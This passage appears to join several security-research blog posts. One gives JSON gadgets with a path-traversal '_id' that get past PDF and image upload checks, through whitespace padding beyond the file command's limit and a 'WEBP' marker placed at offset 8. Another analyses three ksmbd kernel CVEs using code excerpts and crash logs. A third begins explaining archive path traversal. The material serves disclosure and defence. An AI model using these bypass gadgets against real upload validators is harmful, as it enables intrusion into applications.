{"_id":"../../../../CSPT?","bypass":"%PDF-1.3 1 0 obj <<   /Pages 2 0 R   /Type /Catalog >> endobj 2 0 obj <<   /Count 1   /Kids [     3 0 R   ]   /Type /Pages >> endobj 3 0 obj <<   /Contents 4 0 R   /MediaBox [ 0 0 200 200 ]   /Parent 2 0 R   /Resources <<     /Font << /F1 5 0 R >>   >>   /Type /Page >> endobj 4 0 obj <<   /Length 50 >> stream BT   /F1 10 Tf   20 100 Td   (CSPT) Tj ET endstream endobj 5 0 obj <<   /Type /Font   /Subtype /Type1   /BaseFont /Helvetica >> endobj xref 0 6 0000000000 65535 f 0000000009 00000 n 0000000062 00000 n 0000000133 00000 n 0000000277 00000 n 0000000370 00000 n trailer <<   /Size 6   /Root 1 0 R >> startxref 447 %%EOF "}

While this PDF will not render in recent PDF viewers, it will be readable by pdflib and pass the file upload checks.
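The transformation can be automated with a few lines. The sketch below assumes a purely textual PDF (no binary streams, and no double quotes or backslashes, which JSON escaping would alter); the function name is hypothetical and the key names `_id` and `bypass` follow the example above.

```javascript
// Turn a textual PDF into a single JSON string value by replacing line breaks
// with spaces, then wrap it in a JSON object next to the CSPT payload.
// The key names `_id` and `bypass` follow the example above.
function wrapPdfInJson(pdfText, csptPath) {
  const singleLine = pdfText.replace(/\r?\n/g, ' ');
  return JSON.stringify({ _id: csptPath, bypass: singleLine });
}
```

Replacing the line feeds before serializing matters: left in place, they would be emitted as the two-character escape sequence `\n`, which a PDF parser would not treat as whitespace between object definitions.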

Bypassing file Command Validation

In some environments, the file command or a library based on file is used to detect file types.

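const fs = require('fs');
const tmp = require('tmp');
const { execFileSync } = require('child_process');

async function checkFileCommand(binaryFile) {
    // Write the upload to a temporary file
    const tmpobj = tmp.fileSync();
    fs.writeSync(tmpobj.fd, binaryFile);
    fs.closeSync(tmpobj.fd);

    // Run the file command and capture the detected MIME type
    const output = execFileSync('file', ["-b", "--mime-type", tmpobj.name]);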

    const isValid = (output.toString() === 'application/pdf\n')
    if (!isValid) {
        throw new Error(`content - type: File is not a PDF : ${output}`);
    }
    tmpobj.removeCallback();

}

Technique:

The difference with mmmagic is that, before checking the magic bytes, the file command tries to parse the file as JSON. If it succeeds, the file is considered to be JSON and no other checks are performed. So we can’t use the same trick as with mmmagic. However, the file command has a known limit on the size of files it can process. This is an extract from the file man page:

     -P, --parameter name=value
             Set various parameter limits.

            Name         Default    Explanation
            bytes        1048576    max number of bytes to read from file
            elf_notes    256        max ELF notes processed
            elf_phnum    2048       max ELF program sections processed
            elf_shnum    32768      max ELF sections processed
            encoding     65536      max number of bytes for encoding evaluation
            indir        50         recursion limit for indirect magic
            name         60         use count limit for name/use magic
            regex        8192       length limit for regex searches

We can see a limit on the number of bytes to read. We can exploit this limit by padding the file with whitespace characters (such as spaces or tabs) until the file exceeds the parsing limit. Once the limit is reached, the file_is_json function will fail, and the file will be classified as a different file type (e.g., a PDF).

For example, we can create a file like this:

{
  "_id": "../../../../CSPT?",
  "bypass": "%PDF-1.3 1 0 obj <<   /Pages 2 0 R   /Type /Catalog >> endobj 2 0 obj <<   /Count 1   /Kids [     3 0 R   ]   /Type /Pages >> endobj 3 0 obj <<   /Contents 4 0 R   /MediaBox [ 0 0 200 200 ]   /Parent 2 0 R   /Resources <<     /Font << /F1 5 0 R >>   >>   /Type /Page >> endobj 4 0 obj <<   /Length 50 >> stream BT   /F1 10 Tf   20 100 Td   (CSPT) Tj ET endstream endobj 5 0 obj <<   /Type /Font   /Subtype /Type1   /BaseFont /Helvetica >> endobj xref 0 6 0000000000 65535 f 0000000009 00000 n 0000000062 00000 n 0000000133 00000 n 0000000277 00000 n 0000000370 00000 n trailer <<   /Size 6   /Root 1 0 R >> startxref 447 %%EOF <..A LOT OF SPACES..> "
}

When uploaded, the file command will be unable to parse this large JSON structure, causing it to fall back to normal file detection and to treat the file as a PDF.
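Generating the padding by hand is impractical, so a small helper is useful. The sketch below pads the `bypass` value with spaces until the serialized file is one byte larger than the default `bytes` limit quoted above; the function name is hypothetical, and how much padding a given version of file actually needs is an assumption to verify against the target.

```javascript
const FILE_BYTES_LIMIT = 1048576; // default "bytes" parameter from the man page extract

// Pad the `bypass` string value with spaces until the serialized file
// is larger than the number of bytes that `file` reads by default.
function padGadget(gadget, limit = FILE_BYTES_LIMIT) {
  const baseLength = Buffer.byteLength(JSON.stringify(gadget), 'utf8');
  const missing = Math.max(0, limit - baseLength + 1);
  const padded = { ...gadget, bypass: gadget.bypass + ' '.repeat(missing) };
  return JSON.stringify(padded);
}
```

The output remains valid JSON for the browser, since the extra spaces live inside a string value and need no escaping.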

Bypassing Image Upload file-type Restriction Using the WEBP Format

Image uploads often use libraries like file-type to validate file formats. The following code tries to ensure that the uploaded file is an image.

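const checkFileType = async (binary) => {
    // file-type is ESM-only, so it is loaded with a dynamic import here
    const { fileTypeFromBuffer } = await import('file-type');

    const type = await fileTypeFromBuffer(binary);
    // fileTypeFromBuffer resolves to undefined when no known format is detected
    const result = type ? type.mime : 'unknown';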

    const isValid = result.startsWith('image/');
    if (!isValid) {
        throw new Error('file-type: File is not an image : ' + result);
    }
};

Technique:

Sometimes, these libraries check for specific magic numbers at a predefined offset. In this example, file-type checks if the magic bytes are present at offset 8:

https://github.com/sindresorhus/file-type/blob/v19.6.0/core.js#L358C1-L363C1

if (this.checkString('WEBP', {offset: 8})) {
  return {
    ext: 'webp',
    mime: 'image/webp',
  };
}

As we have control over the starting bytes, we can craft a JSON object that places the magic bytes (WEBP) at the correct offset, allowing the file to pass validation as an image while still being valid JSON. Here’s an example:

{"aaa":"WEBP","_id":"../../../../CSPT?"}

This file will pass the file-type check for images, while still containing JSON data that can be used for CSPT.
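The offset arithmetic is easy to get wrong, so it is worth asserting it when building the file. The sketch below (with a hypothetical function name) relies on the fact that `{"aaa":"` is exactly 8 bytes long, which places the value of the first key at offset 8.

```javascript
// Build a JSON gadget whose bytes 8..11 spell "WEBP".
// `{"aaa":"` is exactly 8 bytes long, so the value of the first key starts at offset 8.
function buildWebpJsonGadget(csptPath) {
  const text = '{"aaa":"WEBP",' + JSON.stringify({ _id: csptPath }).slice(1);
  const buffer = Buffer.from(text, 'utf8');
  if (buffer.toString('latin1', 8, 12) !== 'WEBP') {
    throw new Error('WEBP marker is not at offset 8');
  }
  return buffer;
}
```

Changing the length of the first key name shifts the marker, which is why the check on the resulting buffer is kept inside the helper.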

Conclusion

Bypassing file-upload restrictions is not new but we wanted to share some methods we used in past years to upload JSON gadgets when file-upload restrictions are implemented. We used them in order to perform CSPT2CSRF or any other exploits (XSS, etc.) but they can be applied in other contexts too. Don’t hesitate to dig into third-party source code in order to understand how it works.

All these examples and files have been included in our CSPTPlayground. The playground doesn’t only include CSPT2CSRF but also other examples such as a JSONP gadget or Open Redirect. This was built based on feedback received from Isira Adithya (@isira_adithya) and Justin Gardner (@Rhynorater). Thank you so much!

More Information

If you would like to learn more about our other research, check out our blog, follow us on X (@doyensec) or feel free to contact us at info@doyensec.com for more information on how we can help your organization “Build with Security”.

ksmbd vulnerability research

2025-01-07T00:00:00+01:00

Introduction

At Doyensec, we decided to perform a vulnerability research activity on the SMB3 Kernel Server (ksmbd), a component of the Linux kernel. Initially, it was enabled as an experimental feature, but in kernel version 6.6 the experimental flag was removed, and it has been considered stable since.

Ksmbd splits tasks to optimize performance, handling critical file operations in kernel space and non-performance-related tasks, such as DCE/RPC and user account management, in user space via ksmbd.mountd. The server uses a multi-threaded architecture to efficiently process SMB requests in parallel, leveraging kernel worker threads for scalability and user-space integration for configuration and RPC handling.

Ksmbd is not enabled by default, but it is a great target for learning the SMB protocol while also exploring Linux internals, such as networking, memory management, and threading.

The ksmbd kernel component binds directly to port 445 to handle SMB traffic. Communication between the kernel and the ksmbd.mountd user-space process occurs via the Netlink interface, a socket-based mechanism for kernel-to-user space communication in Linux. We focused on targeting the kernel directly due to its direct reachability, even though ksmbd.mountd operates with root privileges.

The illustrative diagram of the architecture can be found here in the mailing list and is displayed below:

               |--- ...
       --------|--- ksmbd/3 - Client 3
       |-------|--- ksmbd/2 - Client 2
       |       |         ____________________________________________________
       |       |        |- Client 1                                          |
<--- Socket ---|--- ksmbd/1   <<= Authentication : NTLM/NTLM2, Kerberos      |
       |       |      | |     <<= SMB engine : SMB2, SMB2.1, SMB3, SMB3.0.2, |
       |       |      | |                SMB3.1.1                            |
       |       |      | |____________________________________________________|
       |       |      |
       |       |      |--- VFS --- Local Filesystem
       |       |
KERNEL |--- ksmbd/0(forker kthread)
---------------||---------------------------------------------------------------
USER           ||
               || communication using NETLINK
               ||  ______________________________________________
               || |                                              |
        ksmbd.mountd <<= DCE/RPC(srvsvc, wkssvc, samr, lsarpc)   |
               ^  |  <<= configure shares setting, user accounts |
               |  |______________________________________________|
               |
               |------ smb.conf(config file)
               |
               |------ ksmbdpwd.db(user account/password file)
                            ^
  ksmbd.adduser ------------|

Multiple studies on this topic have been published, including those by Thalium and pwning.tech. The latter contains a detailed explanation on how to approach fuzzing from scratch using syzkaller. Although the article’s grammar is quite simple, it provides an excellent starting point for further improvements we built upon.

We began by intercepting and analyzing legitimate communication using a standard SMB client. This allowed us to extend the syzkaller grammar to include additional commands implemented in smb2pdu.c.

During fuzzing, we encountered several challenges, one of which was addressed in the pwning.tech article. Initially, we needed to tag packets to identify the syzkaller instance (procid). This tagging was required only for the first packet, as subsequent packets shared the same socket connection. To solve this, we modified the first (negotiation) request by appending 8 bytes representing the syzkaller instance number. Afterward, we sent subsequent packets without tagging.
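The tagging step itself is simple to picture. The sketch below is only an illustration in JavaScript, not the harness code used during the research: the helper name is hypothetical, and the little-endian encoding of the 8-byte instance number is an assumption.

```javascript
// Append an 8-byte instance identifier to the first (negotiation) packet only.
// Little-endian encoding and the helper name are assumptions for illustration.
function tagFirstPacket(packet, procId) {
  const tag = Buffer.alloc(8);
  tag.writeBigUInt64LE(BigInt(procId));
  return Buffer.concat([packet, tag]);
}
```

Subsequent packets on the same socket are sent unchanged, since the connection already identifies the instance.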

Another limitation of syzkaller is its inability to use malloc() for dynamic memory allocation, complicating the implementation of authentication in pseudo syscalls. To work around this, we patched the relevant authentication (NTLMv2) and packet signature verification checks, allowing us to bypass negotiation and session setup without valid signatures. This enabled the invocation of additional commands, such as ioctl processing logic.

To create more diverse and valid test cases, we initially extracted communication using strace, or manually crafted packets. For this, we used Kaitai Struct, either through its web interface or visualizer. When a packet was rejected by the kernel, Kaitai allowed us to quickly identify and resolve the issue.

During our research, we identified multiple security issues, three of which are described in this post. These vulnerabilities share a common trait - they can be exploited without authentication during the session setup phase. Exploiting them requires a basic understanding of the communication process.

Communication

During KSMBD initialization (whether built into the kernel or as an external module), the startup function create_socket() is called to listen for incoming traffic:

// https://elixir.bootlin.com/linux/v6.11/source/fs/smb/server/transport_tcp.c#L484
	ret = kernel_listen(ksmbd_socket, KSMBD_SOCKET_BACKLOG);
	if (ret) {
		pr_err("Port listen() error: %d\n", ret);
		goto out_error;
	}

The actual data handling occurs in the ksmbd_tcp_new_connection() function and the spawned per-connection threads (ksmbd:%u). This function also allocates the struct ksmbd_conn, representing the connection:

// https://elixir.bootlin.com/linux/v6.11/source/fs/smb/server/transport_tcp.c#L203
static int ksmbd_tcp_new_connection(struct socket *client_sk)
{
	// ..
	handler = kthread_run(ksmbd_conn_handler_loop,
			      KSMBD_TRANS(t)->conn,
			      "ksmbd:%u",
			      ksmbd_tcp_get_port(csin));
	// ..
}

The ksmbd_conn_handler_loop is crucial as it handles reading, validating and processing SMB protocol messages (PDUs). In the case where there are no errors, it calls one of the more specific processing functions:

// https://elixir.bootlin.com/linux/v6.11/source/fs/smb/server/connection.c#L395
		if (default_conn_ops.process_fn(conn)) {
			pr_err("Cannot handle request\n");
			break;
		}

The processing function adds a SMB request to the worker thread queue:

// ksmbd_server_process_request
static int ksmbd_server_process_request(struct ksmbd_conn *conn)
{
	return queue_ksmbd_work(conn);
}

This occurs inside queue_ksmbd_work, which allocates the ksmbd_work structure that wraps the session, connection, and all SMB-related data, while also performing early initialization.

In the Linux kernel, adding a work item to a workqueue requires initializing it with the INIT_WORK() macro, which links the item to a callback function to be executed when processed. Here, this is performed as follows:

// https://elixir.bootlin.com/linux/v6.11/source/fs/smb/server/server.c#L312
	INIT_WORK(&work->work, handle_ksmbd_work);
	ksmbd_queue_work(work);

We are now close to processing SMB PDU operations. The final step is for handle_ksmbd_work to extract the command number from the request

// https://elixir.bootlin.com/linux/v6.11/source/fs/smb/server/server.c#L213
rc = __process_request(work, conn, &command);

and execute the associated command handler.

// https://elixir.bootlin.com/linux/v6.11/source/fs/smb/server/server.c#L108
static int __process_request(struct ksmbd_work *work, struct ksmbd_conn *conn,
			     u16 *cmd)
{
	// ..
	command = conn->ops->get_cmd_val(work);
	*cmd = command;
	// ..

	cmds = &conn->cmds[command];
	// ..
	ret = cmds->proc(work);

Here is the list of the procedures that are invoked:

// https://elixir.bootlin.com/linux/v6.11/source/fs/smb/server/smb2ops.c#L171
	[SMB2_NEGOTIATE_HE]	=	{ .proc = smb2_negotiate_request, },
	[SMB2_SESSION_SETUP_HE] =	{ .proc = smb2_sess_setup, },
	[SMB2_TREE_CONNECT_HE]  =	{ .proc = smb2_tree_connect,},
	[SMB2_TREE_DISCONNECT_HE]  =	{ .proc = smb2_tree_disconnect,},
	[SMB2_LOGOFF_HE]	=	{ .proc = smb2_session_logoff,},
	[SMB2_CREATE_HE]	=	{ .proc = smb2_open},
	[SMB2_QUERY_INFO_HE]	=	{ .proc = smb2_query_info},
	[SMB2_QUERY_DIRECTORY_HE] =	{ .proc = smb2_query_dir},
	[SMB2_CLOSE_HE]		=	{ .proc = smb2_close},
	[SMB2_ECHO_HE]		=	{ .proc = smb2_echo},
	[SMB2_SET_INFO_HE]      =       { .proc = smb2_set_info},
	[SMB2_READ_HE]		=	{ .proc = smb2_read},
	[SMB2_WRITE_HE]		=	{ .proc = smb2_write},
	[SMB2_FLUSH_HE]		=	{ .proc = smb2_flush},
	[SMB2_CANCEL_HE]	=	{ .proc = smb2_cancel},
	[SMB2_LOCK_HE]		=	{ .proc = smb2_lock},
	[SMB2_IOCTL_HE]		=	{ .proc = smb2_ioctl},
	[SMB2_OPLOCK_BREAK_HE]	=	{ .proc = smb2_oplock_break},
	[SMB2_CHANGE_NOTIFY_HE]	=	{ .proc = smb2_notify},
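
The dispatch pattern used by __process_request, where the command number taken from the request selects a handler from a table, can be modeled in a few lines. The sketch below is a toy model in JavaScript rather than kernel code: the handler bodies are placeholders, only three commands are listed, and the work object shape is hypothetical.

```javascript
// Toy model of the dispatch step: the command number taken from the request
// selects a handler from a table. Handler bodies are placeholders.
const SMB2_NEGOTIATE = 0x0000;
const SMB2_SESSION_SETUP = 0x0001;
const SMB2_ECHO = 0x000d;

const handlers = new Map([
  [SMB2_NEGOTIATE, (work) => `negotiate:${work.id}`],
  [SMB2_SESSION_SETUP, (work) => `session_setup:${work.id}`],
  [SMB2_ECHO, (work) => `echo:${work.id}`],
]);

function processRequest(work) {
  const handler = handlers.get(work.command);
  if (!handler) {
    // Unknown command numbers must be rejected before any handler runs
    throw new Error(`unsupported command 0x${work.command.toString(16)}`);
  }
  return handler(work);
}
```

Because the command number is attacker-controlled, every handler in the table is reachable from the network once the request passes the earlier validation steps.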

After explaining how the PDU function is reached, we can move on to discussing the resulting bugs.

CVE-2024-50286

The vulnerability stems from improper synchronization in the management of the sessions_table in ksmbd. Specifically, the code lacks a sessions_table_lock to protect concurrent access during both session expiration and session registration. This issue introduces a race condition, where multiple threads can access and modify the sessions_table simultaneously, leading to a Use-After-Free (UAF) in cache kmalloc-512.

The sessions_table is implemented as a hash table and it stores all active SMB sessions for a connection, using session identifier (sess->id) as the key.

During the session registration, the following flow happens:

A new session is created for the connection.
Before registering the session, the worker thread calls ksmbd_expire_session to remove expired sessions, so that stale sessions do not consume resources.
Once cleanup is complete, the new session is added to the connection’s session list.

Operations on this table, such as adding (hash_add) and removing sessions (hash_del), lack proper synchronization, creating a race condition.

// https://elixir.bootlin.com/linux/v6.11/source/fs/smb/server/smb2pdu.c#L1663
int smb2_sess_setup(struct ksmbd_work *work)
{
	// .. 
	ksmbd_conn_lock(conn);
	if (!req->hdr.SessionId) {
		sess = ksmbd_smb2_session_create(); // [1]
		if (!sess) {
			rc = -ENOMEM;
			goto out_err;
		}
		rsp->hdr.SessionId = cpu_to_le64(sess->id);
		rc = ksmbd_session_register(conn, sess); // [2]
		if (rc)
			goto out_err;

		conn->binding = false;

At [1], the session is created, by allocating the sess object:

// https://elixir.bootlin.com/linux/v6.11/source/fs/smb/server/mgmt/user_session.c#L381
	sess = kzalloc(sizeof(struct ksmbd_session), GFP_KERNEL);
	if (!sess)
		return NULL;

At this point, with a large number of simultaneous connections, some sessions can expire. When ksmbd_session_register at [2] is invoked, it calls ksmbd_expire_session ([3]):

// https://elixir.bootlin.com/linux/v6.11/source/fs/smb/server/mgmt/user_session.c#L192
int ksmbd_session_register(struct ksmbd_conn *conn,
			   struct ksmbd_session *sess)
{
	sess->dialect = conn->dialect;
	memcpy(sess->ClientGUID, conn->ClientGUID, SMB2_CLIENT_GUID_SIZE);
	ksmbd_expire_session(conn); // [3]
	return xa_err(xa_store(&conn->sessions, sess->id, sess, GFP_KERNEL));
}

Since there is no table locking implemented, the expired sess object could be removed from the table ([4]) and deallocated ([5]):

// https://elixir.bootlin.com/linux/v6.11/source/fs/smb/server/mgmt/user_session.c#L173
static void ksmbd_expire_session(struct ksmbd_conn *conn)
{
	unsigned long id;
	struct ksmbd_session *sess;

	down_write(&conn->session_lock);
	xa_for_each(&conn->sessions, id, sess) {
		if (atomic_read(&sess->refcnt) == 0 &&
		    (sess->state != SMB2_SESSION_VALID ||
		     time_after(jiffies,
			       sess->last_active + SMB2_SESSION_TIMEOUT))) {
			xa_erase(&conn->sessions, sess->id);
			hash_del(&sess->hlist); // [4]
			ksmbd_session_destroy(sess); // [5]
			continue;
		}
	}
	up_write(&conn->session_lock);
}

However, in another thread, the cleanup could be invoked when the connection is terminated in ksmbd_server_terminate_conn by calling ksmbd_sessions_deregister, operating on the same table and without the appropriate lock ([6]):

// https://elixir.bootlin.com/linux/v6.11/source/fs/smb/server/mgmt/user_session.c#L213
void ksmbd_sessions_deregister(struct ksmbd_conn *conn)
{
	struct ksmbd_session *sess;
	unsigned long id;

	down_write(&sessions_table_lock);
	// .. ignored, since the connection is not binding
	up_write(&sessions_table_lock);

	down_write(&conn->session_lock);
	xa_for_each(&conn->sessions, id, sess) {
		unsigned long chann_id;
		struct channel *chann;

		xa_for_each(&sess->ksmbd_chann_list, chann_id, chann) {
			if (chann->conn != conn)
				ksmbd_conn_set_exiting(chann->conn);
		}

		ksmbd_chann_del(conn, sess);
		if (xa_empty(&sess->ksmbd_chann_list)) {
			xa_erase(&conn->sessions, sess->id);
			hash_del(&sess->hlist); // [6] 
			ksmbd_session_destroy(sess);
		}
	}
	up_write(&conn->session_lock);
}

One possible flow is outlined here:

Thread A                         | Thread B
---------------------------------|-----------------------------
ksmbd_session_register           | 
ksmbd_expire_session             |  
                                 | ksmbd_server_terminate_conn
                                 | ksmbd_sessions_deregister
ksmbd_session_destroy(sess)      |   |
    |                            |   |
    hash_del(&sess->hlist);      |   |
    kfree(sess);                 |   |
                                 |   hash_del(&sess->hlist);

With KASAN enabled, the issue manifested as the following crashes:

BUG: KASAN: slab-use-after-free in __hlist_del include/linux/list.h:990 [inline]
BUG: KASAN: slab-use-after-free in hlist_del_init include/linux/list.h:1016 [inline]
BUG: KASAN: slab-use-after-free in hash_del include/linux/hashtable.h:107 [inline]
BUG: KASAN: slab-use-after-free in ksmbd_sessions_deregister+0x569/0x5f0 fs/smb/server/mgmt/user_session.c:247
Write of size 8 at addr ffff888126050c70 by task ksmbd:51780/39072

BUG: KASAN: slab-use-after-free in hlist_add_head include/linux/list.h:1034 [inline]
BUG: KASAN: slab-use-after-free in __session_create fs/smb/server/mgmt/user_session.c:420 [inline]
BUG: KASAN: slab-use-after-free in ksmbd_smb2_session_create+0x74a/0x750 fs/smb/server/mgmt/user_session.c:432
Write of size 8 at addr ffff88816df5d070 by task kworker/5:2/139

Both issues result in an out-of-bounds (OOB) write at offset 112.

CVE-2024-50283: ksmbd: fix slab-use-after-free in smb3_preauth_hash_rsp

The vulnerability was introduced in the commit 7aa8804c0b, when implementing the reference count for sessions to avoid UAF:

// https://github.com/torvalds/linux/blob/7aa8804c0b67b3cb263a472d17f2cb50d7f1a930/fs/smb/server/server.c
send:
	if (work->sess)
		ksmbd_user_session_put(work->sess);
	if (work->tcon)
		ksmbd_tree_connect_put(work->tcon);
	smb3_preauth_hash_rsp(work); // [8]
	if (work->sess && work->sess->enc && work->encrypted &&
	    conn->ops->encrypt_resp) {
		rc = conn->ops->encrypt_resp(work);
		if (rc < 0)
			conn->ops->set_rsp_status(work, STATUS_DATA_ERROR);
	}

	ksmbd_conn_write(work);

Here, the ksmbd_user_session_put decrements the sess->refcnt and if the value reaches zero, the kernel is permitted to free the sess object ([7]):

// https://github.com/torvalds/linux/blob/7aa8804c0b67b3cb263a472d17f2cb50d7f1a930/fs/smb/server/mgmt/user_session.c#L296
void ksmbd_user_session_put(struct ksmbd_session *sess)
{
	if (!sess)
		return;

	if (atomic_read(&sess->refcnt) <= 0)
		WARN_ON(1);
	else
		atomic_dec(&sess->refcnt); // [7]
}

The smb3_preauth_hash_rsp function ([8]) that follows accesses the sess object without verifying if it has been freed ([9]):

// https://github.com/torvalds/linux/blob/7aa8804c0b67b3cb263a472d17f2cb50d7f1a930/fs/smb/server/smb2pdu.c#L8859
	if (le16_to_cpu(rsp->Command) == SMB2_SESSION_SETUP_HE && sess) {
		__u8 *hash_value;

		if (conn->binding) {
			struct preauth_session *preauth_sess;

			preauth_sess = ksmbd_preauth_session_lookup(conn, sess->id);
			if (!preauth_sess)
				return;
			hash_value = preauth_sess->Preauth_HashValue;
		} else {
			hash_value = sess->Preauth_HashValue; // [9]
			if (!hash_value)
				return;
		}
		ksmbd_gen_preauth_integrity_hash(conn, work->response_buf,
						 hash_value);
	}

This can result in a use-after-free (UAF) condition when accessing the freed object, as detected by KASAN:

BUG: KASAN: slab-use-after-free in smb3_preauth_hash_rsp (fs/smb/server/smb2pdu.c:8875) 
Read of size 8 at addr ffff88812f5c8c38 by task kworker/0:9/308

CVE-2024-50285: ksmbd: check outstanding simultaneous SMB operations

After reporting the bugs and confirming the fix, we identified another issue when sending a large number of packets. Each time queue_ksmbd_work is invoked during a socket connection, it allocates data through ksmbd_alloc_work_struct:

// https://elixir.bootlin.com/linux/v6.11/source/fs/smb/server/ksmbd_work.c#L21
struct ksmbd_work *ksmbd_alloc_work_struct(void)
{
	struct ksmbd_work *work = kmem_cache_zalloc(work_cache, GFP_KERNEL);
    // ..
}

In SMB, credits are designed to control the number of requests a client can send. However, the affected code executed before enforcing the credit limits.
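
To make the ordering problem concrete, here is a minimal Python sketch of the general idea of checking a per-connection limit before any per-request allocation happens. It is not the ksmbd patch: the Connection class, its max_credits and outstanding fields, and both helper functions are hypothetical names used only for illustration.

```python
from dataclasses import dataclass


@dataclass
class Connection:
    """Hypothetical per-connection state; not ksmbd's real structure."""
    max_credits: int      # ceiling on simultaneous requests
    outstanding: int = 0  # requests accepted but not yet completed


def try_queue_work(conn: Connection) -> bool:
    """Accept a request only while the connection is under its limit."""
    if conn.outstanding >= conn.max_credits:
        return False      # reject before any per-request allocation
    conn.outstanding += 1  # the work item would be allocated here
    return True


def complete_work(conn: Connection) -> None:
    """Release the slot once the request has been handled."""
    conn.outstanding -= 1


conn = Connection(max_credits=3)
accepted = [try_queue_work(conn) for _ in range(5)]
print(accepted)  # [True, True, True, False, False]
```

With the check placed first, a client that floods the connection is refused once the limit is reached, instead of causing one allocation per packet.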

After approximately two minutes of sending these packets through a remote socket, the system consistently encountered a kernel panic and restarted:

[  287.957806] Out of memory and no killable processes...
[  287.957813] Kernel panic - not syncing: System is deadlocked on memory
[  287.957824] CPU: 2 UID: 0 PID: 2214 Comm: ksmbd:52086 Tainted: G    B              6.12.0-rc5-00181-g6c52d4da1c74-dirty #26
[  287.957848] Tainted: [B]=BAD_PAGE
[  287.957854] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
[  287.957863] Call Trace:
[  287.957869]  <TASK>
[  287.957876] dump_stack_lvl (lib/dump_stack.c:124 (discriminator 1)) 
[  287.957895] panic (kernel/panic.c:354) 
[  287.957913] ? __pfx_panic (kernel/panic.c:288) 
[  287.957932] ? out_of_memory (mm/oom_kill.c:1170) 
[  287.957964] ? out_of_memory (mm/oom_kill.c:1169) 
[  287.957989] out_of_memory (mm/oom_kill.c:74 mm/oom_kill.c:1169) 
[  287.958014] ? mutex_trylock (./arch/x86/include/asm/atomic64_64.h:101 ./include/linux/atomic/atomic-arch-fallback.h:4296 ./include/linux/atomic/atomic-long.h:1482 ./include/linux/atomic/atomic-instrumented.h:4458 kernel/locking/mutex.c:129 kernel/locking/mutex.c:152 kernel/locking/mutex.c:1092) 

The reason was that the ksmbd kept creating threads, and after forking more than 2000 threads, the ksmbd_work_cache depleted available memory.

This could be confirmed by using slabstat or inspecting /proc/slabinfo. The number of active objects steadily increased, eventually exhausting kernel memory and causing the system to restart:

# ps auxww | grep -i ksmbd | wc -l
2069

# head -2 /proc/slabinfo; grep ksmbd_work_cache /proc/slabinfo
slabinfo - version: 2.1
# name            <active_objs> <num_objs> <objsize> <objperslab> <pagesperslab> : tunables <limit> <batchcount> <sharedfactor> : slabdata <active_slabs> <num_slabs> <sharedavail>
ksmbd_work_cache  16999731 16999731    384   21    2 : tunables    0    0    0 : slabdata 809511 809511      0
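
As a rough cross-check of the numbers above, the following Python sketch parses the ksmbd_work_cache line and estimates how much memory the cache was holding. The 4 KiB page size is an assumption (typical for x86-64), and slab_usage is a hypothetical helper, not an existing tool.

```python
# The slabinfo line captured above, copied verbatim.
SLABINFO_LINE = (
    "ksmbd_work_cache  16999731 16999731    384   21    2 : "
    "tunables    0    0    0 : slabdata 809511 809511      0"
)
PAGE_SIZE = 4096  # assumption: 4 KiB pages


def slab_usage(line: str, page_size: int = PAGE_SIZE) -> dict:
    """Estimate memory held by one cache from a /proc/slabinfo line."""
    fields = line.split()
    name, active_objs, _num_objs, objsize, _objperslab, pagesperslab = fields[:6]
    # After the "slabdata" marker: <active_slabs> <num_slabs> <sharedavail>
    num_slabs = int(fields[fields.index("slabdata") + 2])
    return {
        "name": name,
        "object_bytes": int(active_objs) * int(objsize),
        "slab_bytes": num_slabs * int(pagesperslab) * page_size,
    }


usage = slab_usage(SLABINFO_LINE)
print(f"{usage['name']}: "
      f"{usage['object_bytes'] / 2**30:.2f} GiB in objects, "
      f"{usage['slab_bytes'] / 2**30:.2f} GiB in slab pages")
```

Under that assumption, the work cache alone accounts for roughly 6 GiB, which is consistent with the out-of-memory panic shown earlier.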

This issue was not identified by syzkaller but was uncovered through manual testing with the triggering code.

Conclusion

Even though syzkaller identified and triggered two of the vulnerabilities, it failed to generate a reproducer, requiring manual analysis of the crash reports. These issues were accessible without authentication and further improvements in fuzzing are likely to uncover additional bugs either from complex locking mechanisms that are difficult to implement correctly or other factors. Due to time constraints, we did not attempt to create a fully working exploit for the UAF.


Unsafe Archive Unpacking: Labs and Semgrep Rules

2024-12-16T00:00:00+01:00

Introduction

During my recent internship with Doyensec, I had the opportunity to research decompression attacks across different programming languages. As the use of archive file formats is widespread in software development, it is crucial for developers to understand the potential security risks involved in handling these files.

The objective of my research was to identify, analyze, and detect vulnerable implementations in several popular programming languages used for web and app development, including Python, Ruby, Swift, Java, PHP, and JavaScript. These languages have libraries for archive decompression that, when used improperly, may potentially lead to vulnerabilities.

To demonstrate the risk of unsafe unpacking, I created proof-of-concept (PoC) code with different vulnerable implementations for each method and each language. My work also focused on safe alternatives for each one of the vulnerable implementations. Additionally, I created a web application to upload and test whether the code used in a specific implementation is safe or not.

To efficiently search for vulnerabilities on larger codebases, I used a popular SAST (Static Application Security Testing) tool - Semgrep. Specifically, I wrote a set of rules to automatically detect those vulnerable implementations, making it easier to identify vulnerabilities.

Secure and insecure code, labs and Semgrep rules for all programming languages have been published on https://github.com/doyensec/Unsafe-Unpacking.

Understanding Archive Path Traversal

Extracting an archive (e.g., a ZIP file) usually involves reading all its contents and writing them to the specified extraction path. An archive path traversal aims to extract files to directories that are outside the intended extraction path.

This can occur when archive extraction is improperly handled, as archives may contain files with filenames referencing parent directories (e.g., using ../). If not properly checked, these sequences may cause the extraction to occur outside the intended directory.

For example, consider a ZIP file with the following structure:

/malicious
    /foo.txt
    /foo.py
    /../imbad.txt

When unzipping the archive to /home/output, if the extraction method does not validate or sanitize the file paths, the contents may be written to the following locations:

/home/output/foo.txt
/home/output/foo.py
/home/imbad.txt

As a result, imbad.txt would be written outside the intended directory. If the vulnerable program runs with high privileges, this could also allow the attacker to overwrite sensitive files, such as /etc/passwd – where Unix-based systems store user account information.
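
The scenario above can be reproduced in a few lines of Python. This sketch builds a small archive in memory and prints where each entry would land if its name were simply joined to the output directory. Nothing is written to disk, and posixpath is used so the result is the same on any platform; the entry names and /home/output mirror the example above.

```python
import io
import posixpath
import zipfile

# Build an archive in memory with one harmless and one traversal entry.
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as zf:
    zf.writestr("foo.txt", "harmless")
    zf.writestr("../imbad.txt", "escapes the output directory")

output_dir = "/home/output"
resolved = {}
with zipfile.ZipFile(buf) as zf:
    for name in zf.namelist():
        # What a naive extractor computes, then where that path really points.
        resolved[name] = posixpath.normpath(posixpath.join(output_dir, name))
        print(f"{name!r} -> {resolved[name]}")
```

The second entry resolves to /home/imbad.txt, one level above the directory the caller asked for.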

Proving the Concept: Code Examples

